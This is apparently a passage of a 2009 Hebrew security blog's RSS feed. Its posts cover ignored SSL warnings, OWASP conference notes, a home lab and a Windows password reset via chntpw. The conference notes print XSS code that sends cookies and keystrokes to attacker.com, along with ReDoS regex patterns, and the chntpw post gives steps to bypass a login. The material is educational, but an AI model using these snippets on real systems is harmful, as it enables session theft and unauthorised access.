המחקר בא לבדוק עד כמה בעייתית הודעת השגיאה של Certificate לא תקין מבחינת המשתמש שגולש אל שירות שאמור להיות מאובטח.
החוקרים גילו ש- 55% עד 100% מהמשתמשים התעלמות מהתראת הבטיחות של הדפדפן.
התלות היא בניסוח בו משתמש הדפדפן כדי להעביר את המידע למשתמש ובסוג האתר אליו [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1132&crtId=148&dt=1257940433">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>קראתי לא מזמן כתבה מ-themarker שמתארת מחקר שהתבצע בנושא ה-SSL ו-CERTIFICATES החוקיים.</p>
<p>המחקר בא לבדוק עד כמה בעייתית הודעת השגיאה של Certificate לא תקין מבחינת המשתמש שגולש אל שירות שאמור להיות מאובטח.</p>
<p>החוקרים גילו ש- 55% עד 100% מהמשתמשים התעלמות מהתראת הבטיחות של הדפדפן.</p>
<p>התלות היא בניסוח בו משתמש הדפדפן כדי להעביר את המידע למשתמש ובסוג האתר אליו הם גולשים.</p>
<p>רבים מהגולשים חושבים שהם יכולים להתעלם מההודעה אם מדובר באתר שהם סומכים עליו אך נרתעים מעבודה מול אתר עם Certificate שבור כאשר האתר פחות מהימן.</p>
<p>הבעיה פה היא שדווקא באתרים שהגולשים מכירים וסומכים עליהם, אין משמעות אמיתית לעובדה שהחתימה אינה תקינה.</p>
<p>דוגמה טובה לאתרים כאלה הם אתרי בנקים – המשתמשים סומכים עליהם ולכן אין משמעות שה-Certificate אינו תקין.</p>
<p>המשמעות היא שגולשים חשופים יותר דווקא באתרים כאלה להתקפות Man in the middle, בדיוק אותם אתרים שבהם נוהגים לייצר מנגנון הצפנה כזה שחלק מתפקידו להתמודד עם איום שכזה.</p>
<p>ב-FireFox 3 והאלה הדפדפן מקשה על המשתמש להתעלם מההזהרות ואכן במחקר עלה שדווקא המשתמשים בדפדפן זה התעלמו פחות מהודעות האזהרה הרלוונטיות.</p>
<p>התראות אלטרנטיביות שנוסו על דפדפנים הצליחו להשיג יעילות גבוהה יותר מול המשתמשים.</p>
<p>מסקנות:</p>
<p>החוקרים אומרים שהמערכת אמורה פשוט למנוע גישה ולא רק לייצר התראה כיוון שהתראות עובדות רק עד גבול מסויים. המערכת צריכה להחליט אם מדובר בהתקפה ואם כן- פשוט לחסום את המשתמש מלהיכנס לאתר בעייתי.</p>
<p>תוספות שלי:</p>
<p>מניסיון העבר אני יכול להעיד שרובם הגדול של המשתמשים אינם מבינים את הודעות השגיאה. מדובר באי הבנה על בסיס יכולת טכנולוגית או בשל אי הבנת השפה בה מוצגת ההתראה באופן מספק.</p>
<p>ראיתי לא פעם אנשים לוחצים על Accept רק כי לא ידעו מה ההתראה הרלוונטית אומרת ומה הסכנה שאליה הם נחשפו.</p>
<p>ב-WINDOWS VISTA מיקרוסופט ניסתה להכניס מנגנון התראות, UAC, שאמור להזהיר את המשתמש מביצוע פעולה בעייתית או מסוכנת.</p>
<p>הבעיה ביישום הייתה שהרבה מאוד פעולות הקפיצו את חלון ההתראה והתוצאה הייתה דרישה מצד המשתמשים להסיר את העניין. זו טעות נפוצה של אנשי אבטחה שגורמים ל-USABILITY להיות הרבה פחות טוב כדי לייצר מנגנון מאובטח יותר. התוצאה היא בד&quot;כ נטרול/החלפה של רכיב האבטחה.</p>
<p>ב-WINDOWS 7 נראה שהמנגנון הרבה יותר סלחני ורלוונטי ולכן כנראה שיהיה יותר יעיל.</p>
<p>הפרדוקס הוא יעילות מבחינת אבטחה מול שימושיות.</p>
<p>פעם אחר פעם מוכח שתפיסת האבטחה חייבת לאפשר למשתמש לעבוד בלי הרבה פגיעה בשימושיות. במידה והדרישה הזו לא מתקבלת התוצאה לעיתים רבות תהיה שהמוצר יכשל בתפקידו וייזנח.</p>
<p><strong> </strong></p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1132&crtId=148&dt=1257940433"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1132/feed</wfw:commentRss>
		<slash:comments>8</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1132?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫מה היה בכנס OWASP2009?‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/T1WExKoKEyo/1121</link>
		<comments>http://www.hacking.org.il/1121#comments</comments>
		<pubDate>Fri, 11 Sep 2009 12:29:47 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1121</guid>
		<description><![CDATA[&#8235;כנס OWASP 2009:
הרצאה ראשונה: מדברת על זיהוי הקלדות בצורה מסויימת – לא שמעתי אותה ולכן לא אגיב או ארחיב עליה.
עדי שהרבני, Utilizing XSS vulnerabilities:
בעקבות עבודה מול לקוח ומציאת XSS במערכות שלו וטענה של הלקוח שלא ניתן לנצל את אותו XSS.
עפ&#34;י DESIGN – לא ניתן לייצר בעיית אבטחה ע&#34;י JS בשל מנגנון SOP. סקריפט מאתר X [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1121&crtId=148&dt=1257940433">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><h1>כנס OWASP 2009:</h1>
<p>הרצאה ראשונה: מדברת על זיהוי הקלדות בצורה מסויימת – לא שמעתי אותה ולכן לא אגיב או ארחיב עליה.</p>
<h2>עדי שהרבני, Utilizing XSS vulnerabilities:</h2>
<p>בעקבות עבודה מול לקוח ומציאת XSS במערכות שלו וטענה של הלקוח שלא ניתן לנצל את אותו XSS.</p>
<p>עפ&quot;י DESIGN – לא ניתן לייצר בעיית אבטחה ע&quot;י JS בשל מנגנון SOP. סקריפט מאתר X יכול לתקשר ולייצר אינטראקציה מלאה רק עם אתר X.</p>
<p>XSS שובר את SOP.</p>
<p>ניתן לייצר מנגנון אבטחה ע&quot;י SESSION COOKIE = YOUR IDENTIFICATON. הדבר בעייתי כש-XSS שולח את העוגיה לתוקף..</p>
<p>דוגמה:</p>
<pre>
&lt;script src="<a href="http://attacker.com/attack.js">http://attacker.com/attack.js</a>";&lt;/script&gt;
</pre>
<p>עדי מייצר פונקציה:</p>
<pre align=right dir=ltr>
Function senddata(data) {

Img=document.createElement("img");

Img.src='<a href="http://attacker.com/data=">http://attacker.com/data=</a>'+data;

Document.body.appendChild)img);

}
</pre>
<p>אם ה-COOKIE הוא HTTP ONLY? אפשר להריץ KEYLOGGER על המחשב של המותקף..שמים IFRAME למותקף שדרכו הוא יגלוש וכך ה-KL שלנו ימשיך לרוץ במעבר אל עמודים אחרים.</p>
<pre align=right dir=ltr>
Function hijackKeyStrokes() {

Frame.document.onkeypress = function() {

sendData(string.fromcharcode(frame.event.keycode));

}

}
</pre>
<p>שאלה: מה קורה אם יש למשתמש TOKEN?<br />
מכינים לו עמוד שירוץ רק ב-ON SUBMIT. כשהמתקף יבצע SUBMIT וייאלץ בכל אופן להקליד את הקוד שלו – הקוד שלנו ירוץ..</p>
<p>שאלה: מה קורה אם האתר שלי רץ על HTTPS?<br />
עדי עונה שאין הבדל רק שחשוב שאם יש הפנייה לסקריפט חיצוני שגם הוא יהיה על HTTPS.</p>
<h2>אבי דוגלן, identity management.</h2>
<p>אבי מסביר מראש שזאת הרצאה מאוד לא טכנית ודי מסובכת. The missing link.<br />
מה זאת מערכת IDM?<br />
מערכת תשתיתית וארגונית לניהול היישויות והמשתמשים בארגון.<br />
זמן הטמעה בארגון של 50K עובדים (ארגון בינוני/גדול) הוא כ-6 חודשים לטענת VENDORS אך אורכת בין שנתיים לשלוש שנים.<br />
עלות כ-100K$ לטענת VENDORS, עלות אמיתי של כ-2-3M$.<br />
ההרצאה עצמה לא אמרה הרבה, היה מאוד משעמם ולהערכתי הרבה מאוד אנשים יצאו החוצה.<br />
מה הקשר של זה ל-OWASP? לא מובן.</p>
<h2>Regular Expression Denial of Service: Adam Weidman.</h2>
<p>ReDoS – התקפה שיכולה לרוץ על השרת או הלקוח.<br />
DoS – התקפה על Avalability.<br />
ההתקפה הקלאסית: שליחת הרבה פקטות ובעקבות כך גרימת עומס והקרסת האפליקציה.<br />
התקפות חכמות:<br />
-          במקרה של BOF באפליקציה יש אפשרות להקריס עם פקטות מעטות ואפילו אחת בלבד.<br />
-          Fragmentation of data structure<br />
התקפה נוספות: בעזרת REGEX = REDOS ידוע משנת 2003.<br />
החידוש הוא שימוש ב-REGEX כדי לתקוף אפליקציה WEBית.<br />
מה זה REGEX מסוכן? כזה שיש לו בעיה ועלול להיתקל בקלטים מסויימים:</p>
<pre align=right dir=ltr>
<ol>
<li>(a+)+</li>
<li>([a-zA-Z]+)*</li>
<li>(a|aa)+</li>
<li>(a|a?)+</li>
</ol>
</pre>
<p>אם נזין להן קלט כגון: Aaaaaaaaaaaaaaaax זה יכול לייצר בעיה..<br />
איפה יש אפשרות לנצל?<br />
IIS משתמש ב-REGEX כדי לעשות ולידציות לקלטים ולכן חשופים להתקפה הזו.<br />
גם DB מסויימים מאפשרים לעבוד עם REGEX ולכן גם הם חשופים להתקפה.<br />
מערכות IDS ו-IPS גם הן מנוהלות ומבוססות REGEX וגם WAFים ולכן חלק מאלה חשופים גם כן.<br />
איך תוקפים SERVER SIDE?<br />
התקפה עיוורת כשלתוקף אין מידע.<br />
בד&quot;כ יש צורך בהתקפה שאינה עיוורת כיוון שהולידציה מתבצעת גם ב-SS וגם ב-CS, ז&quot;א שכל מה שצריך זה לפתוח את הסורס של ה-HTML ויהיה שם סקריפט ולידציה.<br />
Google code search מאפשר לחפש REGEXים בעייתיים באפליקציות קוד פתוח <img src='http://www.hacking.org.il/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<p>רעיון חביב:<br />
אדם לקח את ההצעה של וידוא כתובת מייל נכונה מפרוייקט עזוב ב-OWASP והראה איך אפשר לייצר עליו DOS.<br />
זה היה חביב ועופר שיזף היה חייב לעלות לבמה ולהסביר שמדובר בפרוייקט עזוב ולכן לא מתוחזק. עפר הציע שמישהו ייקח זאת על עצמו.</p>
<h2>SSSL – Server Side Secure Login:</h2>
<p>הגנה מהתקפות פישינג.<br />
פישינג בד&quot;כ מתחיל במייל עם לינק, כשהמותקף מקבל ולוחץ הוא מגיע לאתר שגונב את הפרטים שלו.<br />
ההתמקדות בפרוייקט היא בצד הלקוח ה-SSLי כשהמשתמש מבין שהוא לא באתר האמיתי.<br />
מתי יש בעיה? כשעל האתר המתקיף יש סרטיפיקט מתאים לאתר הפישינג או כשאין בכלל מנעול והאתר אינו SSLי.<br />
גם באתרים עם אזהרה על סרטיפיקט שאינו ולידי רובם הגדול של המשתמשים עדיין לוחצים על הלינק ועובדים מול האתר.<br />
פתרון מוצע: login bookmark.<br />
האתר מייצר לינק ייחודי לכל משתמש שבתהליך הרישום יוכנס ל-BOOKMARK של הדפדפן.<br />
רק לאחר זיהוי של הסיסמה והכניסה דרך ה-BOOKMARK הוא יוכל להיכנס.<br />
בניסוי באוניברסיטת בר-אילן מול אתר שמשתמשים בו כ-500 סטודנטים, ניסו לבדוק מה אחוז הזיהוי של מתקפות:<br />
קבוצת הבקרה – נסמוך על הדפדפן – כ-20%<br />
שם אתר + לא אינטראקטיבי – כ-40%.<br />
מזהים אינטראקטיביים – כ-80%.<br />
השיטה שלהם:<br />
משלבת LOGIN BOOKMARK + INTERACTIVE LOGIN, פתרון קל להטמעה.<br />
הרעיון – למשתמש יש אפשרות להיכנס רק דרך ה-BOOKMARK ואז הוא חייב לבחור את התמונה שהוא יודע עליה.<br />
רעיון נחמד.<br />
לדעתי הקונספט של שימוש ב-BOOKMARK מאוד מסורבל. לא רואה את עצמי משתמש בדבר כזה..</p>
<p>על הכנס.<br />
הארגון היה טוב, כמו תמיד.<br />
כל הכבוד למרכז הבין תחומי שמקצה מקום לעניין.<br />
לדעתי ההרצאה של דוגלן לא היתה צריכה להיות בכנס הזה &#8211; אין בה שום קשר ל-web apps.<br />
ההרצאות האחרות?<br />
מאוד נהנתי מההרצאה על ה-DoS עם REGEX. הרעיון חביב.<br />
ההרצאה של עדי שהרבני היתה חביבה אם כי לי היא לא חידשה כלום. עדיין &#8211; עדי הוא תותח וכיף לשמוע אותו מרצה.<br />
פגשתי את רוני בכר, נחום הספאמר, ארז מטולה, שרון (לא מזכיר את השם המלא שלך <img src='http://www.hacking.org.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' />  ) ועוד מגוון אנשים מעניינים.<br />
היה נחמד מאוד כי ההרצאה של דוגלן נתנה לנו הרבה זמן לדבר <img src='http://www.hacking.org.il/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' /> </p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1121&crtId=148&dt=1257940433"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1121/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1121?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫שינוי סביבת העבודה שלי והעברת מכונת WINDOWS אל VMWARE‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/RnE9v4FXvMo/1118</link>
		<comments>http://www.hacking.org.il/1118#comments</comments>
		<pubDate>Sat, 15 Aug 2009 13:23:23 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[אובונטו]]></category>
		<category><![CDATA[וירטואליזציה]]></category>
		<category><![CDATA[מעבדה]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1118</guid>
		<description><![CDATA[&#8235;יש לי כמה וכמה מחשבים בבית.
על רובם היה בעבר XP, מחשב אחד היה עם VISTA64 והיום הוא עם WINDOWS7 ומחשב העבודה העיקרי שלי היום הוא עם ubuntu וכך גם המחשבים הניידים שלי.
אני חייב לציין שהגרסה האחרונה של אובונטו פשוט מעולה וממלאת את כל צרכי ואפילו הצלחתי להתקין עליה את המודם הסלולארי שלי (לאחר מאמץ אמנם).
בקיצור [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1118&crtId=148&dt=1257940433">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>יש לי כמה וכמה מחשבים בבית.</p>
<p>על רובם היה בעבר XP, מחשב אחד היה עם VISTA64 והיום הוא עם WINDOWS7 ומחשב העבודה העיקרי שלי היום הוא עם ubuntu וכך גם המחשבים הניידים שלי.</p>
<p>אני חייב לציין שהגרסה האחרונה של אובונטו פשוט מעולה וממלאת את כל צרכי ואפילו הצלחתי להתקין עליה את המודם הסלולארי שלי (לאחר מאמץ אמנם).</p>
<p>בקיצור &#8211; המטרה הסופית היא להעביר את כל המחשבים ללינוקס.</p>
<p>הבעיה:</p>
<p>1. אתר הבנק לא תומך כראוי ב-FF.</p>
<p>2. APPLE הנבלות שמכריחים אותי להשתמש ב-ITUNES.</p>
<p>3. אשתי מעדיפה את ה-WINDOWS שלה.</p>
<p>הפתרון:</p>
<p>1. מחשב אחד נשאר עם WINDOWS7. הוא ישמש את אשתי לצרכים שלה ואותי ל-ITUNES.</p>
<p>2. כל המחשבים האחרים הופכים ללינוקסים, הפצות שונות.</p>
<p>3. רכישת מערך NAS (התמודדות עם הדיסקים הקשיחים שלא ממש אוהבים לעבוד).</p>
<p>4. שרת VM. כרגע הוא על האובונטו שלי אך בעתיד הקרוב יהפוך ל-ESX. השרת יכיל את כל אותם מחשבי XP ואחרים שאני עדיין זקוק להם למחקרים כאלה או אחרים.</p>
<p>VMware Server היום מחולק בחינם. הוא מוצר לא רע בכלל, אבל יש לו כמה בעיות ולכן בסוף אני מתכנן שרת ESX חביב.</p>
<p>ב-HOW TO FORGE יש מאמר שמסביר איך להתקין VMware על אובונטו (<a href="http://www.howtoforge.com/how-to-install-vmware-server-2-on-ubuntu-9.04" target="_blank">http://www.howtoforge.com/how-to-install-vmware-server-2-on-ubuntu-9.04</a>).</p>
<p>אבל איך ממירים את המכונות הקיימות למכונות וירטואליות על השרת?</p>
<p>מסתבר שיש Converter מעולה של VMware. (אפשר להוריד מפה: <a href="http://www.vmware.com/products/converter" target="_blank">http://www.vmware.com/products/converter</a>)</p>
<p>פשוט מתקינים וניתן להמיר איתו כל מכונה כמעט! משהו יפה שיש בו זה שהוא יודע להשתמש ב-SYSPREP של WINDOWS כדי להתגבר על השינוי בחומרה ולכן המערכת עובדת באופן מושלם ב-VM.</p>
<p>לא לשכוח לכבות את האנטיוירוס שלכם &#8211; הוא בעייתי לסוג העבודה הזה.</p>
<p>אז מה השגתי?</p>
<p>1. התייעלות &#8211; פחות מחשבים עובדים 24/7.</p>
<p>2. סביבת מעבדה מעולה (שרק דורשת הרבה זכרון). ניתן לבצע REVERT למכונות, לשכפל מכונה בקלות וכ&quot;ו.</p>
<p>3. נוחות לכל מי שצריך מחשב בבית.</p>
<p>4. את הפוסט הזה <img src='http://www.hacking.org.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1118&crtId=148&dt=1257940433"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1118/feed</wfw:commentRss>
		<slash:comments>17</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1118?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫שחזור חומר בבית – עד כמה זה אפשרי?‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/y6nHNH6khbQ/1116</link>
		<comments>http://www.hacking.org.il/1116#comments</comments>
		<pubDate>Mon, 03 Aug 2009 21:47:02 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1116</guid>
		<description><![CDATA[&#8235;בחצי שנה האחרונה קרסו לי בנפרד, שני דיסקים של 1TB. (שניהם של סיגייט &#8211; אחד סידרה שנודעה מראש כדפוקה והשני סידרה שבה הם &#34;התגברו על כל התקלות&#34;).
החומר מגובה רק בחלקו. מה לא? דברים פחות חשובים. מסתבר שגם הם כואבים כשלא מגבים אותם.
הדיסק עצמו החל לתקתק וכמובן &#8211; לא היה נגיש יותר.
לאחר יום של מנוחה ללא [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1116&crtId=148&dt=1257940433">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>בחצי שנה האחרונה קרסו לי בנפרד, שני דיסקים של 1TB. (שניהם של סיגייט &#8211; אחד סידרה שנודעה מראש כדפוקה והשני סידרה שבה הם &quot;התגברו על כל התקלות&quot;).</p>
<p>החומר מגובה רק בחלקו. מה לא? דברים פחות חשובים. מסתבר שגם הם כואבים כשלא מגבים אותם.</p>
<p>הדיסק עצמו החל לתקתק וכמובן &#8211; לא היה נגיש יותר.</p>
<p>לאחר יום של מנוחה ללא שהיה מחובר למחשב הדיסק תיקתק הרבה פחות, מה שגרם לי לחשוד שמדובר בהתחממות שגורמת לו לתקתק.</p>
<p>הדיסק פורק מהמחשב, נארז היטב בניילון אטום והוטבע כמעט כולו במים (מה שביצבץ היה החלק של החיבורים החשמליים, אותו לא הכנסתי).</p>
<p>המים- מים קרים עם קרח מפוזר. שיהיה לו נוח.</p>
<p>התוצאה &#8211; הדיסק לא מתקתק.</p>
<p>מה שנשאר לעשות זה להוציא את כל החומר מהר ככל האפשר וזה מה שעשיתי.</p>
<p>מקווה שלא תיזדקקו לטיפ כזה, אבל זה עובד כל עוד לא מרטיבים את הדיסק.</p>
<p>נ.ב. מזל טוב לי &#8211; באותו יום גם הלך לי ספק כוח ומיגרנה שהתחילה עוד אתמול. אחלה. והשבוע רק התחיל..</p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1116&crtId=148&dt=1257940433"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1116/feed</wfw:commentRss>
		<slash:comments>26</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1116?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫בלי קשר למחשבים‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/xW6D0wPOIvU/1114</link>
		<comments>http://www.hacking.org.il/1114#comments</comments>
		<pubDate>Tue, 28 Jul 2009 00:33:22 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1114</guid>
		<description><![CDATA[&#8235;רק למוסיקה.
אור כשדים מתאחדת  
בשבילי זה מאורע. בפעם האחרונה ראיתי אותם לפני המון שנים, מאז אני מתגעגע.
אפשר לקרוא על זה פה:
http://www.mako.co.il/music-Magazine/articles/Article-af6fa85923bb221004.htm
אפשר ומומלץ לבוא, ויש קבוצה בפייסבוק פה:
http://www.facebook.com/event.php?eid=119821653581
אני אהיה שם  
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1114&crtId=148&dt=1257940433">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><p>רק למוסיקה.</p>
<p>אור כשדים מתאחדת <img src='http://www.hacking.org.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>בשבילי זה מאורע. בפעם האחרונה ראיתי אותם לפני המון שנים, מאז אני מתגעגע.</p>
<p>אפשר לקרוא על זה פה:</p>
<p><a href="http://www.mako.co.il/music-Magazine/articles/Article-af6fa85923bb221004.htm" target="_blank">http://www.mako.co.il/music-Magazine/articles/Article-af6fa85923bb221004.htm</a></p>
<p>אפשר ומומלץ לבוא, ויש קבוצה בפייסבוק פה:</p>
<p><a href="http://www.facebook.com/event.php?eid=119821653581" target="_blank">http://www.facebook.com/event.php?eid=119821653581</a></p>
<p>אני אהיה שם <img src='http://www.hacking.org.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1114&crtId=148&dt=1257940433"></div>]]></content:encoded>			<wfw:commentRss>http://www.hacking.org.il/1114/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		<feedburner:origLink>http://www.hacking.org.il/1114?nucrss=1</feedburner:origLink></item>
		<item>
		<title>‫מה לעשות אם שכחת סיסמה ב-WINDOWS?‬</title>		<link>http://feedproxy.google.com/~r/org/RZOX/~3/tjzGlj874u0/1108</link>
		<comments>http://www.hacking.org.il/1108#comments</comments>
		<pubDate>Fri, 17 Jul 2009 05:45:40 +0000</pubDate>
		<dc:creator>‫גיא מזרחי‬</dc:creator>				<category><![CDATA[כללי]]></category>
		<category><![CDATA[האקינג]]></category>
		<category><![CDATA[סיסמאות]]></category>
		<category><![CDATA[פריצה למחשב]]></category>

		<guid isPermaLink="false">http://www.hacking.org.il/?p=1108</guid>
		<description><![CDATA[&#8235;היום הייתי צריך לשחזר במהירות סיסמת משתמש במחשב עם Windows Vista 64 bit שהייתי לידו.
אז איך עושים?
1. CD של backtrack או כל הפצת linux שתרצו.
2. הורידו את התוכנה chntpw. ב-backtrack זה קיים.
3. בצעו mount לכונן ה-windows שלכם מתוך הלינוקס.
(mount /dev/sda1 /mnt/sda1 בד&#34;כ יעשה את העבודה).
4. הפעילו את chntpw כך:
chntpw -i /mnt/sda1/Windows/System32/config/SAM
בתוך התוכנה לחצו על 1 [...]<img height="1" width="1" src="http://services.nuconomy.com/i.nsi?methId=log&projTok=93520d00-2f&ownus=admin&sver=WordPress%2F1.48+%28nuconomy%29&srcId=http%3A%2F%2Fwww.hacking.org.il%2F1108&crtId=148&dt=1257940433">&#8236;]]></description>			<content:encoded><![CDATA[<div dir="rtl"><h3>היום הייתי צריך לשחזר במהירות סיסמת משתמש במחשב עם Windows Vista 64 bit שהייתי לידו.</h3>
<p>אז איך עושים?</p>
<p>1. CD של backtrack או כל הפצת linux שתרצו.</p>
<p>2. הורידו את התוכנה <a href="http://home.eunet.no/%7Epnordahl/ntpasswd/chntpw-source-080526.zip">chntpw</a>. ב-backtrack זה קיים.</p>
<p>3. בצעו mount לכונן ה-windows שלכם מתוך הלינוקס.</p>
<p>(mount /dev/sda1 /mnt/sda1 בד&quot;כ יעשה את העבודה).</p>
<p>4. הפעילו את chntpw כך:</p>
<p>chntpw -i /mnt/sda1/Windows/System32/config/SAM</p>
<p>בתוך התוכנה לחצו על 1 &#8211; כדי לאפס סיסמאות וכ&quot;ו.</p>
<p>בחרו את המשתמש שלכם ואפסו לו סיסמה. אתם יכולים גם לתת לו הרשאות admin אם אתם ממש צריכים.</p>
<p>כדאי אח&quot;כ ללכת ולבצע enable ליוזר שלכם (4 בתפריט) שכנראה כבר ננעל בנסיונות הגישה שלכם.</p>
<p>ביציאה יש שאלה של שמירה או לא &#8211; התשובה היא כן כמובן <img src='http://www.hacking.org.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>קלי קלות, עובד גם על ויסטה 64 ביט.</p>
<h3>עריכה: (כמה הערות בתגובות ששווה להזכיר):</h3>
<p>1. זה כמובן לא נותן פתרון לקבצים שמוצפנים עם EFS. עליהם תצטרכו לעבוד בנפרד. (לא מכיר את העניין לכן לא ממליץ למי שמשתמש בזה להשתמש בפתרון הנ&quot;ל. מצד שני, אני לא מכיר אף אחד שמשתמש בזה).</p>
<p>2.TheLeader מציע את OPHCRACK LINUX וגם את KONBOOT. שתי הצעות טובות.</p>
<p><cite></cite>3. ניב שואל מה הבעיה עם ERD, Active Boot וכ&quot;ו. אין בעיה, פשוט צריך לרכוש אותן או לדאוג להן מראש.</p>
<p>4. gif מציע להשתמש ב-http://www.hirensbootcd.net. פתרון נהדר אם יש לכם את זה מוכן מראש.</p>
<p>5. <a href="http://www.yaronmaor.net/" target="_blank">ירון מאור</a> נותן הסבר על ERD. שווה לקרוא (תגובה 13):</p>
<p>אני אישית מעדיף את סדרת התוכנות ERD.<br />
שימו לב שינן שתי גירסאות של ERD למיקרוסופט:<br />
גירסת 2007 ל- XP/2003<br />
גירסת 2008 ל- ויסטה/2008</p>
<div style="direction: rtl;">
<p>חפשו את זה בתוך חבילת השירות בשם Microsoft Diagnostics and Recovery Toolset</p>
<div style="direction: rtl;">
<p>זה היה של Winternals ונקנה ע&quot;י מיקרוסופט. זה עשה רק טוב כי גירסת 2005 יצאה מחדש כגירסת 2007 (MsDart 5.0) והמנוע מבוסס על WinPE במקום החלופי-תואם שהיה קודם. היתרון הוא היכולת לצרף תוכנות נוספות ולהריצן מתוך ה- Shell בלי בעיות תאימות וכן שפקודות ה- CMD הן מקוריות ולא &quot;ליד&quot; כמו שהיה ב-2005. גירסת הויסטה נקראת MsDart 6.<br />
מיקרוסופט נותנת את המוצר חינם ללקוחות Enterprise בעלי רישיונות Volume License. זה מגיע בתוך חבילת שירות בשם Microsoft Desktop Optimization Pack או בקיצור MDOP.<br />
<a rel="nofollow" href="http://www.microsoft.com/windows/enterprise/products/mdop.aspx">http://www.microsoft.com/windows/enterprise/products/mdop.aspx</a><br />
ושם זה נמצא כאחד המרכיבים של החבילה.<br />
חיפוש קל מעלה את הטורנט הבא:<br />
<a rel="nofollow" href="http://thepiratebay.org/torrent/4229627/Microsoft_Diagnostics_and_Recovery_Toolset_versions_5___6-DVT">http://thepiratebay.org/torrent/4229627/Microsoft_Diagnostics_and_Recovery_Toolset_versions_5___6-DVT</a><br />
לא הורדתי מכאן אבל זה יתן לכם את השמות של מה לחפש… שכחתי לציין אבל גירסה 6 של ויסטה כוללת מלבד כלי ה- ERD הרגילים גם את סביבת התיקון WinRE של ויסטה לתיקון בעיות האתחול, שחזור מגיבוי וכו'.</p>
<p>תודה לירון ולכל יתר המגיבים ונותני העצות, נחמד לראות שיטות אחרות <img src='http://www.hacking.org.il/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </div>
</div>
